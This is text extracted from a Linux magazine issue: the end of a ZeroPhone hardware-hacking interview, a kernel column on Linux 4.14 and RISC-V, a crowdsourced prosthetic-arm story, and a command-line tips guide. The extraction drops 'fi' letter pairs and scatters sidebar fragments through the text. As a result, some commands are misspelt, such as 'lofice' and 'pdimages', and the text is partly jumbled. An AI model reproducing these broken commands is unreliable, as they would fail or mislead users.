You also have add-ons for the ZeroPhone. Can you
tell us about those?
I’m using some of the interfaces that the Raspberry
Pi provides, but there are a lot of interfaces that
are free as well. I’ve connected those interfaces to
expansion ports on the sides of the ZeroPhone and
I thought why not have some boards that would
simplify tasks like programming and working with
flash chips? Then I understood, for example, I could
design a board that has a circuit for a laptop BIOS
chip and use ZeroPhone to reprogram the BIOS off
a laptop in order to, for example, deactivate Intel
Management Engine (see Intel Inside Intel box, p13)
or something like that.
I can desolder the BIOS chip from my laptop;
I can plug it into a ZeroPhone add-on board and
use available BIOS chip programming tools in
order to read the BIOS contents, modify them
using, for example, ME Cleaner, a utility from
Purism. I can modify the BIOS image and flash
it back into the laptop and I’m going to have a
management-disabled laptop. This has been one of
my side projects and I’ve come to understand that
ZeroPhone is also quite a powerful hardware hacking
platform and those expansion ports will make it
even better at it, and it’s something I can do to make
hardware hacking more user-friendly.
Above With access to a
Pick&Place machine at his local
hackerspace, Picugins will be able
to automatically pre-solder some
parts of the kit
What do you think of Purism’s Librem phone?
I find it extraordinarily important, and I believe this
project, if successful, is going to be a breaking point
in history of open source phones. How I see it is that
we’re voting for our ideals with our money, and if we
succeed, it’s going to make other companies listen
to us and understand what we care about – even if
a tiny bit. Furthermore, ZeroPhone, postmarketOS
( and Purism Librem
( are going to have a big overlap in
software, reducing effort duplication and therefore
increasing quality – and I’m sure there has been
sufficient evidence that software quality can make
or break any open source project.
I believe we can make a lot of changes in this
field. Purism is making really modern hardware and
they do need a lot of money to accomplish that.
PostmarketOS is taking old phones and giving them
a new life with Linux, and I’m taking these accessible
single-board computers and making them into
phones and hardware hacking kits.
To learn more about the ZeroPhone project and
possibly get involved, head to the main project page
( and its GitHub repository
Your source of Linux news & views
The kernel column
Jon Masters summarises the latest happenings in the Linux kernel
community, as Linux 4.14-rc3 is released, and ongoing development continues
inus Torvalds announced 4.14-rc3
(release candidate 3) noting that 4.14
has, so far, been a “somewhat painful
release”. He attributes this to “the fact
that it’s meant to be an LTS [Long Term Support]
release”. This means that 4.14 will receive ‘stable’
backported updates (in 4.14.z updates, such as
4.14.1, 4.14.2 and so on) under the maintenance
of Greg Kroah-Hartman (Greg K-H). Greg picks
a new LTS kernel periodically and provides fixes
and security patches as a means to enable
those who are building certain projects to have a
kernel source that lives longer than the usual few
months. This often includes Android or other major
projects that have various channels through which
coordination can occur to choose an LTS kernel for
a release.
The 4.14-rc1 actually came out a day earlier than
typical due to the US Labor Day holiday. As Linus
noted, “I realise that if I had waited until tomorrow,
I would also have hit the 26th anniversary of the
Linux-0.01 release”. The new kernel will feature
a number of exciting core memory additions
visible to x86 users (especially laptops, desktops
and servers), including support for 5-level page
tables (enabling use of many petabytes of system
memory), Address Space ID (ASID) support similar
to that already long available on ARM systems, and
AMD’s ‘Secure Memory Encryption’ (SME). Other
features include support for Heterogeneous Memory
Management (HMM), intended to allow SVM (shared
virtual memory) use cases in which devices such as
GPUs and FPGAs share memory with application
processes seamlessly, and the removal of the legacy
firmware files that used to ship with the kernel (all
distros have long since migrated to shipping the
‘linux-firmware’ standalone package).
With the release of the 4.14 RC kernels came
the closing of the ‘merge window’ ( a period of
time during which disruptive changes are allowed)
and we are now well and truly into the phase
of stabilisation that follows. If the crystal balls
function correctly, 4.14 final should be out right
around next issue. Thorsten Leemhuis followed up
with his usual ‘Reported regressions’ summary for
Jon Masters
is a Linux-kernel hacker who has
been working on Linux for more
than 22 years, since he first
attended university at the age
of 13. Jon lives in Cambridge,
Massachusetts, and works for
a large enterprise Linux vendor,
where he is driving the creation
of standards for energyefficient ARM-powered servers.
4.14 RCs, which included a few reports of scheduling
stalls after boot.
Six-year LTS kernel
One of the more interesting announcements to
come out of the latest Linaro Connect conference
was that the Linux LTS (Long Term Support) kernel
would be getting a longer life cycle going forward.
Traditionally, LTS kernel candidates were chosen
by Greg K-H every couple of years, usually in
collaboration with various industry players such as
Google, who then use the LTS as a basis for their
next Android kernel. The upstream LTS feeds into an
Android common tree that then feeds into vendor
kernel trees maintained by the various mobile SoC
(system-on-chip) manufacturers, and on into the
kernel trees for specific third-party devices (such as
phone handsets).
The whole process is contrived, and usually
results in device kernels that are years out of date,
to the point of reaching end of life soon after the
devices they support hit the market. Needless to
say, this is a frustration for customers (and open
source developers working on the AOSP Android
Open Source Project), as well as Google itself. Apple
has often received high praise for getting all of its
older devices quickly updated with new OS releases,
but this is harder for an OS like Android that targets
many more devices from many independent vendors.
Hence Google has been working with community
members like Greg K-H on a project known as
‘Treble’, which apparently includes leveraging a
longer LTS cycle that can provide a stable kernel for
multi-year (e.g. handset) projects that need updates.
As Ars Technica reported after the announcement,
the longer LTS cycle isn’t solely for the benefit of
Android, but instead will also benefit some of the
mainstream Linux distributions, those building
devices or needing a kernel that has some level
of community maintenance. The ‘Projected EOL’
(end of life) for the older 4.4 kernel release used by
currently shipping Android devices has already been
updated on the website to ‘Feb, 2022’.
As Linus noted, 4.14 is apparently to be another
LTS candidate kernel, which Greg later confirmed
on his blog, “unless it really is a horrid release
and has major problems”.
Adventures in OOM, RISC-V and SMB
RISC-V is a modern, royalty free, fully open source
computer architecture that was developed as an
offshoot of earlier research at the University of
Berkeley (UCB) in California and is now backed by
both a growing online community and a non-profit
foundation. RISC-V is available as a specification
as well as software models (QEMU) that implement
it, hardware design source code (Verilog) that can
be used to ‘synthesize’ logic into FPGAs (fieldprogrammable gate arrays) in lieu of real chips and
If things go according
to plan, RISC-V will be
enabled upstream in
Linux 4.15
in the form of actual real integrated circuits from a
number of firms. A startup called SiFive is working on
many aspects, including low-cost development kits.
Palmer Dabbelt recently posted version 9 of
the core patches needed to enable Linux kernel
support for RISC-V and these passed the review of
Arnd Bergmann, who developed the ‘asm-generic’
reference used for new arch ports and who serves
as the unofficial gatekeeper to new architecture
merging. If things go according to plan, RISC-V will
be enabled upstream in Linux 4.15.
OpenRISC patch
Not to be outdone, the (older) OpenRISC project
posted a 13-part patch series enabling SMP
support for its cleaned up latest revision of
their architecture. Stafford Horne’s patches
are interesting because they include a detailed
discussion of the memory ordering semantics for
OpenRISC as well as the testing methodologies
used to ensure that they got it right. A lot of effort
has recently gone into formal analysis of memory
models used by modern computer architectures,
an otherwise extremely dry and arcane topic, and
consequently one that programmers often fail to
understand. Paul McKenney’s free open source book
Is Parallel Programming Hard, And, If So, What Can
You Do About It? is one of the best resources, and he
is actively involved.
Work is ongoing to teach the Linux cgroups code
about how to better handle OOM (out-of-memory)
conditions. Today, the Linux ‘OOM Killer’ (yes, that
is its real name) will run whenever the system is
running low on available RAM and has already
exhausted other options (such as ‘swapping’ unused
application data out to disk, an action formally
known as ‘paging’). The OOM killer has some limited
logic (such as ‘don’t kill the init process’) that tries to
prevent it wedging the system, but otherwise it has
free rein to kill any process it deems to be a memory
hog. The container work aims to allow this to be
constrained to prioritise killing processes within
a specific container or collection of containers in
preference to other more critical system tasks.
Microsoft has continued its work on cleaning up
the Linux kernel SMB (more formally known as CIFS
– Common Internet File System) support for talking
to Windows PCs, both with new support for extended
attributes in Linux 4.13, as well as a developmental
patch series enabling RDMA (remote direct memory
access) using ‘SMB Direct’ for low-latency, highthroughput remote file copying between Linux and
Microsoft Windows network shares.
Linux 4.14 brings another security enhancement
from Kees Cook of the Google security team. Kees
has been working on kernel security for many years.
His latest contribution enables structure layout
randomisation for kernel data structures, making it
far harder to exploit security bugs by virtue of adding
an unpredictability to the in-memory placement
of critical kernel data that might be needed in a
classical ‘buffer overflow’ attack. He achieves this
through a new GCC plug-in called ‘randstruct’ that
adds a level of randomness to structure layout
during kernel compilation. Kees takes care to avoid
randomising certain core structures, such as those
touched by very low-level assembly code – for
example, a process’s thread_info.
Lorelei’s story
How a five-year-old crowdsourced a robotic prosthetic (with help
from her family and a whole lot of friendly strangers)
is a social
and the founder
of Dev4x, an
open innovation
A father and
daughter team
crowdsourced the
design of a robotic
prosthetic arm and
built one for the
daughter, whose
shoulder and left
arm had been
paralysed by a
rare condition.
Who inspires
Bodo says his work
at Dev4X has been
influenced by two
individuals: one
is former awardwinning journalist
turned author
and government
advisor Charles
Leadbeater, who
evangelises social
the other is Clay
Shirky (
described by TED
founder, Chris
Anderson as a
“prominent thinker
on the social
and economic
effects of internet
cute flaccid myelitis (AFM) is a rare
condition that affects the nervous system
and has about a 2% recovery rate. The
starkness of a medical statistic like this is
brutal, and even more so when they relate to the health of
your own children, but this was what Bodo Hoenen and
his family were facing in the summer of 2016 when their
five-year-old daughter, Lorelei, was diagnosed with AFM.
The condition particularly affects the spinal column and
in Lorelei’s case it had paralysed her left shoulder and left
arm. “The prognosis was that the only thing that would
help was occupational therapy and physiotherapy,” says
Hoenen, “but looking at the results, back then, there were
only two kids that had had any significant recovery…”
Hope was needed and it was sparked by a project the
family saw in the hospital: “Researchers were strapping
on an exoskeleton suit to paraplegic individuals and
providing them the biofeedback with the suit,” recalls
Hoenen. “They also provided visual feedback by adding
a VR headset showing them the actual movement of the
arms. With the headset, you would see yourself walking
and then feel your body walking as the exoskeleton suit
was moving your body and this would force the brain to
think ‘Okay, I’m going to walk now’ and they would pick
up those signals from the brain and translate them into
messages to control the exosuit and VR.”
After consulting specialists, Hoenen theorised that
instead of hooking sensors to the brain they needed to
hook sensors directly to the biceps muscle in Lorelei’s
arm: “We knew there were at least very weak signals
going to the muscle and we were hoping to pick those up
and hoping that forcing her to continue sending signals
to her muscles would help that rehabilitation process.”
Hoenen knew that probably the best way to do this was
to build some kind of robotic prosthetic arm, but he had a
problem: he had no idea how to do it. That’s when he and
Lorelei decided to ask the world. “We decided to leverage
the collective intelligence of everyone around us” says
Hoenen. So, after sifting through all the information they
Open innovation drives
innovation exponentially
compared to closed, but
they failed to grasp that
Email us about the projects you love
Inspiring open source that's changing our world
Above The premise was simple: help rehabilitate Lorelei’s arm
by using sensors to pick up muscle signals and assist the arm to
move up and down inside a sleeve powered by an actuator
could find and talking to other parents with children that
had AFM, Bodo and Lorelei got to work with a simple first
design; they wanted to 3D-print the braces and somehow
acquire an actuator motor to help pull the arm up and
down. But before they got too far into the project, they
decided to record some videos to ask experts for help.
The response was “pleasantly surprising”, says
Hoenen. Within a couple of weeks they’d had Actuonix
( donating actuators while, among
many helpers, they’d received assistance from experts
in battery tech and electronics from South Africa and
Germany respectively, and had a full scan of Lorelei’s
arm done. It wasn’t long before a prototype was made,
followed by a 3D-printed sleeve in PLA.
Signal problems
However, the biggest issue they faced was picking up the
muscle signal from Lorelei’s arm. They discovered that it
was very difficult to filter and normalise the signal and
set a threshold that triggered the actuator. Hoenen found
there was very little difference in the signal between
when her arm was at rest or active. As they tried to set
a threshold, they also noticed that the actuator could
be triggered by a finger twitch or even Lorelei’s heart, so
they put out another video asking for help.
Hoenen pitched the idea that the raw signal could
be run through machine learning or pattern recognition
software to track down a unique signal. Soon after
posting their video, they came across a firm called Coapt
that uses pattern recognition software to help amputees
use prosthetic limbs. The company has a proprietary
system that uses 17 sensors to track the muscle
signals. The software translates the signals it finds into
corresponding movements on a virtual arm (pictured, top
right). Coapt gave the family an evaluation unit to enable
Lorelei to practise and pick up the arm signals, which
meant Hoenen could finally create a working model.
While some manufacturers were incredibly generous,
Hoenen says he encountered a surprising amount of
negativity from others: “A lot of them kept mentioning
‘is this FDA approved?’ [...] From my perspective, I don’t
care. This is about my daughter, I want this solution to
work. This stuff that you’ve got costs $50,000. I just can’t
afford that and the technology that you have isn’t all that
clever, so why don’t we open-source this and expedite the
Top The project is hoping to create an open source equivalent to
the Coapt system Above Bodo and his daughter recorded video
guidance and open-sourced all their documentation to help other
parents facing the same illness
innovation that happens with what we’ve got and this will
create a better world for all of us including your business
model?” Unfortunately, many medical manufacturers
aren’t willing to even consider experimenting with
open models yet. “Open innovation drives innovation
exponentially [compared to] closed, but they failed to
really grasp that,” says Hoenen.
In January of this year, Lorelei came up to her parents
and said: "Hey look what I can do" and was able to move
her arm up and down unassisted. Since then she hasn’t
needed to use the prosthetic and while Hoenen says
it’s not something he wants to take further himself,
he’s helping other parents and trying to tackle “some
of the core challenges still to overcome.” These include
developing bridge software between a system of 17
electrodes and the device, the Raspberry Pi in this
instance, and getting the correct build for the arm sleeve
that houses the electrodes.
Talking about the experience, Hoenen is careful to
downplay the technology. He’s also pragmatic over whether
the arm made that much of a difference to Lorelei’s
recovery: “At the moment, we only have a sample size of
one,” he concedes. At Medicine X Stanford in September,
Hoenen preferred to describe the experience as a story
of “tangible hope, where we would have been spectators
without this project”. However, other parents who have
children diagnosed with AFM are using the project to build
robotic prosthetics and challenging that 2% recovery rate.
Bodo and Lorelei's project is documented and opensourced on with videos
of the journey, guides for building the arm itself and more
details of the key remaining challenges.
Master the terminal
Unlock the power of the terminal with Neil Bothwick's 12-page guide to many
of most useful commands and handy tips and tricks to use in the shell
Terminal techniques
management, p22
basics of working with iles and
File formats, p25
are so many different ile formats for
directories – nothing too exciting, but you
need this before you move on.
each type of content, here we look at ways to
convert between them
Learn some of the secrets that make
working with the shell faster and easier,
especially those that save on typing!
• Networking, p23
control, p26
how to ind out about the various
File systems, p29
disks and USB sticks make look
processes (programs) running on your
computer and how to control them.
different, but are often handled similarly.
A selection of commands for working with
your network, gathering information on it
and making use of it.
Services and logging, p24
the myriad of programs that
• Package management, p27
Add and remove software as well as gather
run automatically at startup, and the
information they are writing to your logs.
details about the software that is already
installed on your computer.
hese days, in theory, there is no
necessity to use the command line
to run and maintain a Linux
system: there are so many graphical tools
available for most tasks. But when did we
start doing only those things we absolutely
had to? The command line provides an
alternative environment to the typical
desktop GUI, with its own set of pros and
cons. The main advantage is that if you
know what you are doing, many tasks can be
accomplished more eficiently in the
command line. That’s just for single tasks,
if you want to do something to ten iles in a
GUI it will often take ten times as long,
compared with an extra couple of seconds
and menus until you ind something that
does what you want; the command line
requires some prior knowledge. None of us
was born with that, and we all continue to
learn, so here is a selection of commandline tips to get you started. We have divided
them into a number of sections, so you can
dip into this later when you have a need for
a particular task.
We have covered a lot in this 12-page
guide so these are brief introductions that
we hope will encourage you to dive into
the manual. However, the most dificult
part of the command line is knowing which
command to use for a particular need, and
we certainly cover that. We give examples,
The most difficult part of the command
line is knowing which command to use for a
particular need – we cover that
on the command line. Another time the shell
is important is when working on a remote
computer over a network connection.
The key phrase is the previous paragraph
is ‘if you know what you are doing’. With a
GUI you can usually hunt around the buttons
but the one thing Linux has never been short
of is documentation. Most commands can
be run with the --help argument, which
generally outputs a brief summary of the
available options. For more information,
consult the man page. For example, you
• Work with the shell, p28
•& System
more p30-31
Discover the secrets of the insides of your
computer without taking a screwdriver to
it, plus some great tips and commands
can view the documentation for the mount
command with man mount.
While it used to be commonplace to
switch to the root user with su, this is
not usually advisable now. As the saying
goes ‘with great power comes great
responsibility’, which, roughly translated,
means ‘you can break things in the shell
but major destruction requires root
permissions’. So use sudo to run commands
as root, but only when you need to.
One of the reasons the terminal is a faster
environment is that you don’t get bothered
with ‘are you sure’ questions. The system
assumes you know what you are doing.
Many commands come with a --pretend or
--dry-run option (see --help for the exact
argument) that shows you what a command
will do without actually doing it. Remember,
a computer does what you tell it to do, not
what you want it to do.
That’s the scary bit out of the way.
Terminal commands are fast, eficient and
well documented and offer many beneits
over their GUI alternatives. We are not
suggesting you ditch the GUI altogether,
but after experimenting with some of the
examples here, we hope you will ind that
you are able to pick the best environment
for each task.
Master the terminal
File management
Learn the basics of working with files
Moving a file
mv ile1 ile2
Moves, or renames, ile1 to ile2. Again, if ile2
is a directory, it moves ile1 into it. Note that ile1
can also be a directory. Add -i or -n to prevent it
overwriting iles of the same name.
>_01 Listing files
Deleting files
rm ile1 ile2...
Deletes the given iles – be very careful when using
this with wildcards. If in doubt, add the -i option to
ask for conirmation. You cannot remove directories
with rm unless you add the -f and -r options – be
careful with this!
ls -l Photos
Lists the contents of the speciied directory, or the current one if none is
given. The -l option enables long format with extra information. Files are
sorted alphabetically; use -t to sort by date/time and -S to sort by size. -r
reverses the sort order.
Pipe down
Some of these
produce a lot of
output; pipe them
to a pager to be
able to read it all.
For example:
$ tree ~ |
gcd /some/path
tree ~
Creates subdir1 inside dir1 in your home directory.
This will fail if ~/dir1 does not exist or if subdir1
does exist. To avoid such errors and create a
hierarchy of directories in one go, add the -p option.
Changing file ownerships…
chown user:group iles
Changes the ownership of the given iles to that
user and group. If you omit the group, only the user
is changed. If you include the : but not the group,
the user’s default group is used. You normally need
to be root to run this.
…and permissions
chmod a+r iles
Sets the permissions of the iles, a+r means set
the read lag (+r) for all users, leaving all other lags
unchanged. You can also use numeric options; the
man page explains all the choices. You need to own
the ile, or be root, to change its permissions.
Copying a file
cp ile1 ile2
Copies ile1 to ile2; if ile2 is a directory, ile1 is copied
into it. The -p switch preserves timestamps and
permissions, otherwise ile2 will have the current time.
If ile1 is a directory, use the -r option, or -a which
combines -r and -p.
mkdir ~/dir1/subdir1
A more structured listing
Shows the contents of your home directory (~ is a
shortcut for home) in a tree layout. This makes it easy
to see the relationship of iles, but can get very long.
Use -L 3, for example, to restrict tree to only three
levels of directories.
Creating directories
Changing directory
The cd command changes the current directory to the
given path, which may be relative or absolute. When run
with no arguments, it changes to your home directory.
To go back to the previous directory, use cd -. To see
where you are now, run pwd.
Matching directories
rsync -a dir1/ dir2/
Syncs the contents of two directories. All iles in
dir1 but not in dir2 (or different there) are copied.
To remove iles from dir2 not in dir1, add --delete.
Add -n to see what will be done without doing it.
Commands for working with the network
What is your computer called?
Find your computer’s network name
with hostname; add -f to get the full name including
the domain, or -d for just the domain. To see your
computer’s IP address, run it with -i.
List network information
ip addr show
The ip command is the successor to the venerable
ifconig. Both commands can be used to show
information about your network interfaces, including
IP address, hardware address, status and more
arcane statistics.
Check your connection
>_17 Log in remotely
ssh user@hostname
SSH, or Secure Shell, opens a shell session on a remote computer. If you
don’t specify the user, your current username is used. The password it
asks for is that of the user on the remote computer. You can also add a
command to the end of the line, which will be run on the remote computer.
Rsync again
rsync user@hostname:dir3/ dir4/
We saw rsync on the previous page, but it can also be
used to synchronise with a remote computer. In such a
case it automatically uses SSH to handle the transfer.
As with scp, you can also copy from local to remote or
the other way.
Tests the state of your connection to the given host.
The numbers it returns are the round-trip time for small
data packets. If it fails to communicate, it may be that
your network is down, the remote host is down or there
is a DNS problem. Time to start digging.
You can quickly email information from the command
line. The -s option sets the subject, which must be
quoted if it contains spaces. The body of the email is
read from standard input, in this case from a ile.
Look up an address
com <ile.txt
Seek help
Send email for the command line
mail -s "Test mail" me@example.
Most commands
can be run with
--help as their
only argument,
to give a brief
reminder of the
available options.
This command queries your default name servers for
the IP address of the hostname you give it. You can also
tell it to use a different name server, such as Google’s,
like this: dig @ An alternative
program for this is nslookup.
Scan for wireless networks
iwlist wlan0 scan
The iwlist command inds information about wireless
networks in range, such as signal strength and whether
they are encrypted. If you want more information on the
network to which you are currently connected, use the
iwconig command.
Copy to another computer
scp ile user@hostname:/some/path
This uses SSH to copy a ile to the remote computer.
If the remote path starts with a /, it is absolute,
otherwise it is relative to the remote user’s home
directory. You can reverse the options to copy a remote
ile to the local system.
>_20 Share files easily
python3 -m http.server
This runs a web server based at the current directory on port
8000. There’s no real security, but it is a quick and easy way
of sharing files between computers on your local network,
especially if the target device or user can’t use a terminal.
Master the terminal
Services and logging
Work with background programs and information
Add your user
to the systemdjournal, adm
or wheel group
to be able
to read the
system journal
without sudo.
Starting and stopping services
Your computer runs many services,
also known as daemons, in the background. On distros
using the older SysVInit service management, these are
controlled by scripts in /etc/init.d, so you would start
Apache with:
/etc/init.d/apache start
Service status
As well as the start example given
above, and the corresponding stop, some service
scripts also take a status option that tells you whether
the service is running or not.
Auto-starting services
With SysVInit you create a symlink from
the init ile to the /etc/rc directory corresponding to
your default run level to have the service start at boot.
Systemd users can run systemctl enable apache2.
service to do this, and disable to reverse it.
Log watching
Many programs write to the system log –
see what’s going on in real time by watching it. Use tail
-f on the system log ile, usually /var/log/messages:
tail -f /var/log/messages
Services systemd style
Systemd uses the systemctl command
to manage services, so you can start one with
something like:
systemctl start apache2.service
There are corresponding stop, restart and status
commands, which all do exactly what they say.
Listing services
SysVInit users can simply use ls
/etc/init.d, while systemd users can use systemctl
list-units to see active services and systemctl
list-unit-iles to see all available services.
Log watching – systemd style
Systemd uses the journalctl command
to work with the system logs:
journalctl -f
You may have to use sudo to see all system events.
Working with system logs
Looking for trouble
Systemd’s journalctl
makes it easy to look for certain events. Use
this after rebooting from a kernel upgrade:
journalctl -b -p err
-b shows only events since last reboot; -p
err shows events marked as error or worse.
Filtering the logs
Watching the log in real time
gives a lot of irrelevant output, so use grep
to keep it informative. For example, if you
want to see what happens when you plug in
a USB device, run:
tail -f var/log/messages | grep -i
-e usb -e sd
The message above will be added to
various system log iles in /var/log.
Add your own entries to
the system log
You can do this by using logger, e.g.:
logger I now want to use the
command line more often!
File formats
Convert files from one format to another
Converting document files
Office files
LibreOfice can run on the
command line (with GUI not running) to
convert between ile types. For example:
lofice --headless --convert-to
xlsx spreadsheet.ods
lofice --headless --convert-to
odt letter.doc
Extract images from a
PDF file
pdimages can extract images embedded
in PDF documents; pdimages -png
someile.pdf someimages will extract all
the images and write each to a separate
ile, someimages-nnn.png. Use -list
to list details of the images rather than
extracting them.
Image conversion
ImageMagick's convert command is
used for this, and can even determine ile types from
the ilename. For example:
convert photo.jpg photo.png
As you'd expect this converts an image from JPG to PNG.
Resizing images
ImageMagick does it again!
convert photo.jpg -resize 200x200 photo.png
convert photo.jpg -resize 25% -quality 50%
The irst command resizes the image to it in a box
of the given size and converts it to PNG. The second
reduces both the size and quality of a JPEG image.
Video container conversion
Video formats are complex, but
sometimes you just want to change the container
format to something you can watch on your phone. One
of the main programs for video conversion is ffmpeg.
ffmpeg -i video.mkv -codec copy video.mp4
This converts the ile while keeping the contents
Convert man pages
Man pages are written in
GROFF, an unusual format. You can convert
to PostScript with man -t and then pipe it
to your printer or a more readable format:
man -t someprog | lpr
man -t someprog | ps2ascii
unchanged, so is very fast. The order of arguments is
important as they are applied to the next ile on the
command line, so -codec must be after the input ile.
Audio conversion
It’s easy to convert Ogg Vorbis iles
to MP3 using ogg2mp3, probably already installed.
To convert all the iles in the current directory use:
See images
If you are in an X
terminal, you can
view images with
the ImageMagick
command that's
called display.
ogg2mp3 --bitrate 256 .
Text files
Use dos2unix to convert a text ile from
a Windows-using friend, then use unix2dos before
sending the ile back to them.
Convert to plain text
Commands like pdftotext and
html2text exist to extract the plain text from a
formatted document, such as a PDF or HTML ile. You
may need to play with the options; some PDF layouts
require the -layout option to keep the text readable.
Identify media files
Mplayer comes with the midentify
command, which gives all sorts of useful information
about the contents of a ile, like length in seconds
and video resolution, along with details of codecs
and bitrates.
Master the terminal
Process control
View and manage running programs and processes
Kill a
You can kill a GUI
program from
an X terminal
with xkill. Run
the command
and click on the
window that you
want to kill.
List running processes
ps aux
This lists all processes running on your computer – you
may be surprised at the number. This sort of command
really needs to be piped to a pager or grep to ind what
you are looking for.
Show resource users
Run top to see a list of processes
sorted by CPU usage, along with overall stats on
processor and memory usage. The results are sorted
by CPU usage by default, but you can use the command
keys to sort by a different criterion – press H to see the
many options.
so use it with care – killall python would terminate
all Python scripts running on your computer.
Tell a program to reload its config
Some programs notice when you modify
their coniguration iles; others only take note of the
ile when they start. In the latter case, you can usually
employ kill or killall to send the HUP signal, which
tells them to reload:
kill -HUP 12345
Who opened that file
If you get an error saying that you
cannot delete or modify a ile because it is open, you
can see which processes have opened which iles with
lsof. As with many of these commands, the output
is usually surprisingly long, but grep is your friend in
inding the culprit:
lsof | grep someile
The fuser command can also be used for this.
Kill a process
Use kill followed by a process number,
gained from ps or top, to send a TERM command to it.
This tells the process to shut down cleanly. If it refuses
to die, use the -KILL option.
kill -KILL 12345
Kill a process by name
killall works like kill except it takes
a program’s name instead of a process number. This
means it will kill all running programs with that name,
>_45 Who
what process?
The output from ps shows many processes
running. To see how they were started, run
pstree, which lists the processes in a tree
so you can see the parent process of each
running program.
Suspend a program
So you start a program in the shell, then
decide you need to do something else. Press Ctrl+Z to
suspend the running program, do what you want and
run either fg or bg to restart it. The former restarts
as before while the latter continues running it in the
background, returning you to the command prompt.
Find a program’s PID
Every process has a unique ID, like the
one we passed to kill earlier. You can ind the PID of a
running process with pgrep programname. This returns
just a list of PIDs, which is ideal for scripting. If you
have several copies of a program running, however, you
can see more detail more detail by adding -a to see the
full command line for each PID. You can also use -f to
match on the full command line, useful for inding the
PID of a script.
Look in /proc
The /proc virtual directory contains a
wealth of system information, including a directory for
each process by PID. Some of the information in here
is pretty esoteric, but there is some basic stuff too.
/proc/PID/cmdline contains the full command
invocation, while /proc/PID/children lists the PIDs of the
processes it launched.
Package management
Install, list and remove software on your computer
Update packages list
apt-get update
When using the APT package manager, the update
command should be run before doing anything
else. It syncs the local list of available packages
with what is available on the servers.
Upgrade packages
apt-get upgrade
A similar-looking command with a very different
purpose, it upgrades all installed packages to the
latest available. It will tell you what it is going to
do and ask for conirmation, so check the list for
any obvious gotchas before telling it to proceed.
Install new packages
apt-get install package1
This installs the packages that you give it.
Additionally, it irst checks whether any other
packages are needed by the software that you
want to install (dependencies) and installs them
too. Replace install with remove to remove
packages. With most apt-get commands, you can
add -s to see what would be done without actually
installing anything.
sudo is your friend
Installing and removing software
requires superuser permissions. In olden times
this used the su command, which required users
to know the root password, enabling them to do
anything on the system. The current best practice
is to use sudo, which runs the given command
with root permissions, but only if that user is
authorised to do so. sudo is not all or nothing like
su – it can be conigured to allow users to run
speciic commands or with speciic arguments.
To run a command as root, preix it with sudo.
RPM update packages
>_56 Table of packages
dpkg --get-selections
A more low-level tool for managing Debian packages is dpkg. It produces a
table of all the packages installed. You can save this to a ile or even pipe it
to the mail command to send yourself a copy, which could be useful when
administering a remote computer over SSH.
Install packages on RPM
While the RPM system is still popular, the rpm command
is less so – yum and dnf are replacements for Fedora
and Red Hat, so the command to install a package is
yum install packagename.
Update packages
yum/dnf update
If this command is followed by the name of one or more
packages, those will be updated to the latest versions.
If run with no names, every package installed on your
system will be updated if an update is available.
Cleaning up
Dependencies can hang around after
you have removed the original package. apt-get
autoremove will clean these up on Debian systems;
yum/dnf autoremove does the same for RPM.
rpm -U packagename
RPM is the other main package management
system, used by Fedora and openSUSE. -U
updates the package to its latest version or
installs it if not already on your system.
No need to reinstall
When a new version of your Debianbased OS is released, instead of downloading an ISO
and reinstalling, you can run apt-get dist-upgrade for
virtually the same effect, without the downtime.
USB boot
GRUB allows
you to easily run
Linux distros
from fast USBattached storage
just as easily as
when they are on
local disks. This
is ideal if you are
short of space.
Master the terminal
Work with the shell
Important tips to make your work with the shell easier
>_61 Aliases
The alias command creates shortcuts to commands
you often use, or add options as default. For instance, some distros alias
rm to rm -i to give ‘are you sure?’ prompts when deleting iles. You can
see the full list of aliases by running alias on its own. If an alias has been
created with the name of a command, you can use the original command
by preixing it with \, for example: \rm "someile".
Go to the start
and end of the
command line
with Ctrl+A and
Ctrl+E. Alt+F
and Alt+B move
forwards and
one word.
TAB completion
Start typing a command and press the
Tab key; your shell with either complete the name or
offer you alternatives if there is more than one match.
The same applies when typing ile or directory names:
compare ls /somepath/toavery/longilename with
ls /soTABtoaTABlonTAB.
Running multiple commands
Separate multiple commands with
semicolons to have them run in sequence.
command1; sleep 5; command 2
Detach your shell session
Use screen to start a new shell from
which you can detach and then reconnect, even from a
different computer over SSH. screen is really useful for
long-running tasks, especially when run remotely.
The shell
maintains a list of the
commands you have run, which
can be very handy. Press the
up arrow key to scroll back
through them. Press Ctrl+R
and start typing a command
you used previously and the
shell will show you the most
recent match; press Ctrl+R
again to see the previous one
and so on. Typing !! will run
the previous command, so if
you forgot that it needed root
privileges, just run sudo !!.
Run one command only if another
command succeeds
The && operator looks at the return code of the
irst command and only proceeds with the next
command if it exited successfully.
command1 && command2
For the opposite effect, use || – here, the second
command is only run if the irst fails.
Record your shell session
Run script and not much will
appear to change, but everything you type and
its output will be recorded to a ile. Press Ctrl+D
when you’re inished and the ile called typescript
will contain a copy of everything you did.
Programs normally read input from
the keyboard and send output to the shell. You can
change this with redirection. Adding <someile
reads input from the ile, while >someile sends
output to the ile. >>someile appends output to
the end of an existing ile. > redirects standard
output, while 2> redirects the standard error
channel. With some shells, &> redirects both to
the same destination.
Learn scripting
These commands are powerful
enough on their own, but really come into their
own when you can run the same command on a
bunch of iles, or even several commands, all at
once. Simple shell scripts are easy to write (and
you can dive into making your own by reading
Essential Linux on p38). At their most basic, they
are a simple list of commands to run, one per line.
Put the magic line #!/bin/sh at the top to have it
recognised as a shell script.
Redirect with sudo
Have you tried to write to a system
ile with sudo echo something >>someile only to
have it fail on write permissions? That’s because
the redirection is running as your user – sudo only
runs echo. The solution is tee, which outputs to
the terminal and a ile at the same time, like this:
echo sometext | sudo tee -a someile
>_ File systems
Mount and work with internal and external file systems
Mount a file system
The command to mount a ile system is:
sudo mount /dev/sdXn /mount/point
…where sdXn is the device node. The mount point
can be anywhere. The ile system is usually detected
automatically, or you can use -t to specify.
Copy a complete file system with dd
dd if=/dev/sdb3 of=someile.img
…will make a bit-for-bit copy of the disk partition to the
given ile. It will be as large as the original partition, so
you may want to pipe the output through a compressor:
dd if=/dev/sdb3 bs=4M | gzip >someile.img.gz
Another way to mount
If a device is listed in /etc/fstab, you
need pass only the device or mount point to the mount
command and it’ll read all other options from fstab. If
fstab contains user or users in the options ield, the ile
system can be mounted/unmounted by a regular user.
Mounting external drives
Unless a device is listed in /etc/fstab,
you can only mount it as root. You could used sudo,
but might then lose write permissions as a normal
user. Desktop automounters take care of that, as does
pmount on the command line. pmount sdb1 mounts
/dev/sdb1 at /media/sdb1 and if it is a Windows ile
system, it makes it owned by the user mounting it.
Check free space
Use df to list the used and available
space on all mounted ile systems. It normally reports
space in ile system blocks, but adding -h gives humanreadable values. If an ext ile system is reporting no
